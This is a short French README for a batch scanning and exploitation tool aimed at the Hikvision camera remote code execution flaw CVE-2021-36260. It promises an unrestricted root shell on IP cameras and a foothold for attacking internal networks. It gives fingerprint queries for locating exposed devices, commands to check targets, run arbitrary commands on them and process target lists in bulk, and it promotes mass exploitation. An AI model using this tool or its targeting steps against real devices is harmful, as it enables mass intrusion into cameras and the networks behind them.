
Outil de détection et d'exploitation par lots des vulnérabilités RCE Hikvision
Cette vulnérabilité permet à un attaquant de prendre totalement le contrôle de l’appareil avec un shell root sans restriction, même si le propriétaire de l’appareil est limité à un shell protégé restreint (psh). Outre l’intrusion dans les caméras IP, il est également possible d’accéder au réseau interne et de l’attaquer.
header="Hikvision"
app="HIKVISION-视频监控"
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Start scanning url
-f FILE, --file FILE read the url from the file
--check Check if vulnerable
--cmd CMD execute cmd (i.e: "ls -l")
Peut être utilisé pour l’exploitation en masse de SRC.